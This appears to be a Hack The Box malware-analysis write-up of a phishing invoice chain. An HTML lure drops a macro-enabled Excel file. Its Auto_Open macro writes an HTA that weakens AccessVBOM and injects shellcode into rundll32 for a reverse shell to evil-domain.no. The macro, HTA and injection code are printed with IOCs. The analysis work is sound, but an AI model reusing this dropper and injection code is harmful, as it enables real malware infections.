TL;DR#
A phishing HTML file poses as an invoice and delivers a macro-enabled Excel workbook (invoice-42369643.xlsm). Upon opening, the Auto_Open macro assembles an HTA payload from three hidden sources — shape metadata, an OLE stream, and the active cell selection — and executes it via mshta.exe. The HTA lowers macro security via registry modification, then drops obfuscated VBA code that injects shellcode into a spawned rundll32.exe process. The shellcode establishes a reverse shell connection to evil-domain.no over port 443.
initial analysis#
The sample is an HTML file containing a single long line.
1$ file *
2invoice-42369643.html: ASCII text, with very long lines (48949)
Excel nalysis#
Opened a html file in sandbox i downloaded a .xlsm file
1invoice-42369643.xlsm: Microsoft Excel 2007+
Static analysis witz oleid confirmed the presence of suspicious VBA macros:
1--------------------+--------------------+----------+--------------------------
2Indicator |Value |Risk |Description
3--------------------+--------------------+----------+--------------------------
4File format |MS Excel 2007+ |info |
5 |Macro-Enabled | |
6 |Workbook (.xlsm) | |
7--------------------+--------------------+----------+--------------------------
8Container format |OpenXML |info |Container type
9--------------------+--------------------+----------+--------------------------
10Encrypted |False |none |The file is not encrypted
11--------------------+--------------------+----------+--------------------------
12VBA Macros |Yes, suspicious |HIGH |This file contains VBA
13 | | |macros. Suspicious
14 | | |keywords were found. Use
15 | | |olevba and mraptor for
16 | | |more info.
17--------------------+--------------------+----------+--------------------------
18XLM Macros |No |none |This file does not contain
19 | | |Excel 4/XLM macros.
20--------------------+--------------------+----------+--------------------------olevba#
olevba was used to extract and analyze the VBA code:
1+----------+--------------------+---------------------------------------------+
2|Type |Keyword |Description |
3+----------+--------------------+---------------------------------------------+
4|AutoExec |Auto_Open |Runs when the Excel Workbook is opened |
5|AutoExec |Label1_Click |Runs when the file is opened and ActiveX |
6| | |objects trigger events |
7|Suspicious|Environ |May read system environment variables |
8|Suspicious|Open |May open a file |
9|Suspicious|Write |May write to a file (if combined with Open) |
10|Suspicious|Output |May write to a file (if combined with Open) |
11|Suspicious|Shell |May run an executable file or a system |
12| | |command |
13|Suspicious|Call |May call a DLL using Excel 4 Macros (XLM/XLF)|
14|Suspicious|Chr |May attempt to obfuscate specific strings |
15| | |(use option --deobf to deobfuscate) |
16|Suspicious|Hex Strings |Hex-encoded strings were detected, may be |
17| | |used to obfuscate strings (option --decode to|
18| | |see all) |
19|Suspicious|Base64 Strings |Base64-encoded strings were detected, may be |
20| | |used to obfuscate strings (option --decode to|
21| | |see all) |
22|IOC |LwTHLrGh.hta |Executable file name |
23+----------+--------------------+---------------------------------------------+Seconds after opening, Auto_Open fires. It assembles the HTA payload from three hidden sources (ActiveSheet.Shapes(2).AlternativeText, OLE stream UZdcUQeJ.yTJtzjKX and Selection) and executes it via mshta.exe:
1Sub Auto_Open()
2 Dim fHdswUyK, GgyYKuJh
3 Application.Goto ("JLprrpFr")
4 GgyYKuJh = Environ("temp") & "\LwTHLrGh.hta"
5
6 Open GgyYKuJh For Output As #1
7 Write #1, hdYJNJmt(ActiveSheet.Shapes(2).AlternativeText & UZdcUQeJ.yTJtzjKX & Selection)
8 Close #1
9
10 fHdswUyK = "msh" & "ta " & GgyYKuJh
11 x = Shell(fHdswUyK, 1)
12End SubActiveSheet.Shapes(2).AlternativeText— the “Alternative Text” field of the second Shape object on the worksheet. In Excel, Shape objects can be images, text boxes, charts, or other graphical elements embedded in a spreadsheet. In this case it stores a hidden encoded payload chunk invisible to the user.UZdcUQeJ.yTJtzjKX— an OLE stream containing a long base64 string:lvbk5hbWUgIiYiQXMgU3RyaW4iJiJ...Selectionin this macro refers to whatever is currently selected in the Excel interface at the time the macro runs—this might be cell text, a range of cells.
vmonkey#
vmonkey emulation confirmed the macro behavior:
1+----------------------+-----------------------------------------------+---------------------------------+
2| Action | Parameters | Description |
3+----------------------+-----------------------------------------------+---------------------------------+
4| Start Regular | | All wildcard matches will match |
5| Emulation | | |
6| Found Entry Point | auto_open | |
7| Object.Method Call | ['JLprrpFr'] | Application.Goto |
8| Environ | ['temp'] | Interesting Function Call |
9| OPEN | C:\Users\admin\AppData\Local\Temp\LwTHLrGh.ht | Open File |
10| | a | |
11| Object.Method Call | [-2147221504, '', ''] | Err.Raise |
12| Dropped File Hash | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1 | File Name: LwTHLrGh.hta |
13| | d49c01e52ddb7875b4b | |
14| Execute Command | mshta C:\Users\admin\AppData\Local\Temp\LwTHL | Shell function |
15| | rGh.hta | |
16| Found Entry Point | label1_click | |
17| Found Entry Point | Label1_Click | |
18+----------------------+-----------------------------------------------+---------------------------------+Sandbox & HTA Analysis#
The malicious Excel file was executed in a sandbox. The dropped HTA file was extracted from the %temp% folder:
1LwTHLrGh.hta: HTML document, ASCII text, with CRLF, LF line terminators
hta file analysis#
The HTA begins by creating a hidden Excel instance and a Wscript.Shell object, then modifies the registry to set AccessVBOM to 1, lowering macro security and allowing programmatic VBA injection:
1Dim objExcel, WshShell, RegPath, action, objWorkbook, xlmodule
2Set objExcel = CreateObject(""Excel.Application"")
3objExcel.Visible = False
4Set WshShell = CreateObject(""Wscript.Shell"")
5
6' Get the old AccessVBOM value
7RegPath = ""HKEY_CURRENT_USER\Software\Microsoft\Office\"" & objExcel.Version & ""\Excel\Security\AccessVBOM""
8
9' Weaken the target
10WshShell.RegWrite RegPath, 1, ""REG_DWORD""
11
12' Run the macro
13Set objWorkbook = objExcel.Workbooks.Add()
14Set xlmodule = objWorkbook.VBProject.VBComponents.Add(1)The rest of the HTA code is heavily obfuscated using four techniques: concatenation splitting (&) to break AV signatures, Chr() calls for special characters, VBA line continuation (_), and keyword fragmentation across concatenation boundaries:
1xlmodule.CodeModule.AddFromString ""Private ""&""Type PRO""&""CESS_INF""&""
2ORMATION""&Chr(10)&"" hPro""&""cess As ""&""Long""&Chr(10)&"" hThr""&
3""ead As L""&""ong""&Chr(10)&"" dwPr""&""ocessId ""&""As Long""&Chr(10)&
4"" dwTh""&""readId A""&""s Long""&Chr(10)& _....Deobfuscation#
A Python script was used to deobfuscate the HTA by resolving Chr() calls, stripping concatenation operators and line continuations:
1import re
2
3with open("LwTHLrGh.hta", "r") as f:
4 data = f.read()
5
6data = re.sub(r'Chr\((\d+)\)', lambda m: chr(int(m.group(1))), data)
7data = data.replace('"', '').replace('&', '').replace('_', '')
8
9with open("clear.vba", "w") as f:
10 f.write(data)The deobfuscated VBA reveals shellcode injection into rundll32.exe:
1myArray = Array(-35,-63,-65,32,86,66,126,-39,116,36,
2-12,91,49,-55,-79,98,49,123,24,3,123,24,-125,
3-61,36,-76,-73,-126,-52,-70,56,123,12,-37...)
4
5If Len(Environ("ProgramW6432")) > 0 Then
6 sProc = Environ("windir") & "\SysWOW64\rundll32.exe"
7Else
8 sProc = Environ("windir") & "\System32\rundll32.exe"
9End If
10
11res = RunStuff(sNull, sProc, ByVal 0, ByVal 0, ByVal 1, ByVal 4, ByVal 0, sNull, sInfo, pInfo)
12
13rwxpage = AllocStuff(pInfo.hProcess, 0, UBound(myArray), H1000, H40)
14
15For offset = LBound(myArray) To UBound(myArray)
16 myByte = myArray(offset)
17 res = WriteStuff(pInfo.hProcess, rwxpage + offset, myByte, 1, ByVal 0)
18Next offset
19
20res = CreateStuff(pInfo.hProcess, 0, 0, rwxpage, 0, 0, 0)
21...[snip]...The shellcode is stored as a signed byte array. A Python script converts it to raw bytes:
1myArray = [
2 -35,-63,-65,32,86,66,126,-39,116,36,-12,91,49,-55,-79,98,49,123,24,3,123,24,-125,
3 -61,36,-76,-73,-126,-52,-70,56,123,12,-37,-79,-98,61,-37,-90,-21,109,-21,-83,-66,-127,
4 -128,-32,42,18,-28,44,92,-109,67,11,83,36,-1,111,-14,-90,2,-68,-44,-105,-52,-79,21,-48,
5 49,59,71,-119,62,-18,120,-66,11,51,-14,-116,-102,51,-25,68,-100,18,-74,-33,-57,-76,56,12,
6 124,-3,34,81,-71,-73,-39,-95,53,70,8,-8,-74,-27,117,53,69,-9,-78,-15,-74,-126,-54,2,
7 ...[snip]...
8]
9
10sc = bytes([b & 0xFF for b in myArray])
11
12with open("sc.bin", "wb") as f:
13 f.write(sc)Shellcode Analysis#
Decoder Stub#
Loading sc.bin in IDA revealed a XOR-based decoder stub. It uses fnstenv to obtain the current instruction pointer via the FPU environment, then iterates over the payload XORing each block with a rolling key:
1seg000:0000000000000000 ffree st(1)
2seg000:0000000000000002 mov edi, 7E425620h ; initial XOR key
3seg000:0000000000000007 fnstenv byte ptr [rsp-0Ch]
4seg000:000000000000000B pop rbx
5seg000:000000000000000C xor ecx, ecx
6seg000:000000000000000E mov cl, 62h ; loop counter = 98
7seg000:0000000000000010 xor [rbx+18h], edi ; decrypt next block
8seg000:0000000000000013 add edi, [rbx+18h] ; update key
9seg000:0000000000000016 add ebx, 24h
10seg000:0000000000000019 mov ah, 0B7hscdbg Emulation#
scdbg emulation of the decoded shellcode revealed a reverse shell connecting to evil-domain.no over port 443:
14010b6 LoadLibraryA(ws2_32)
24010c6 WSAStartup(190)
34010d5 WSASocket(af=2, tp=1, proto=0, group=0, flags=0)
4401109 gethostbyname(evil-domain.no/HTB{g0_G3t_th3_ph1sh3R})
5401121 connect(h=42, host: 127.0.0.1, port: 443)
640113c recv(h=42, buf=12fc60, len=4, fl=0)
740117f closesocket(h=42)
8401109 gethostbyname(evil-domain.no/HTB{g0_G3t_th3_ph1sh3R}) = 1000IOCs#
Files
- invoice-42369643.html — initial phishing document
- invoice-42369643.xlsm — macro-enabled Excel workbook
- C:\Users\*\AppData\Local\Temp\LwTHLrGh.hta — dropped HTA payload
- LwTHLrGh.hta SHA256: 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
Registry
- HKCU\Software\Microsoft\Office\<version>\Excel\Security\AccessVBOM set to 1
Network
- C2 Domain: evil-domain.no
- C2 Port: 443/tcp
Processes
- mshta.exe — HTA execution
- rundll32.exe — shellcode injection target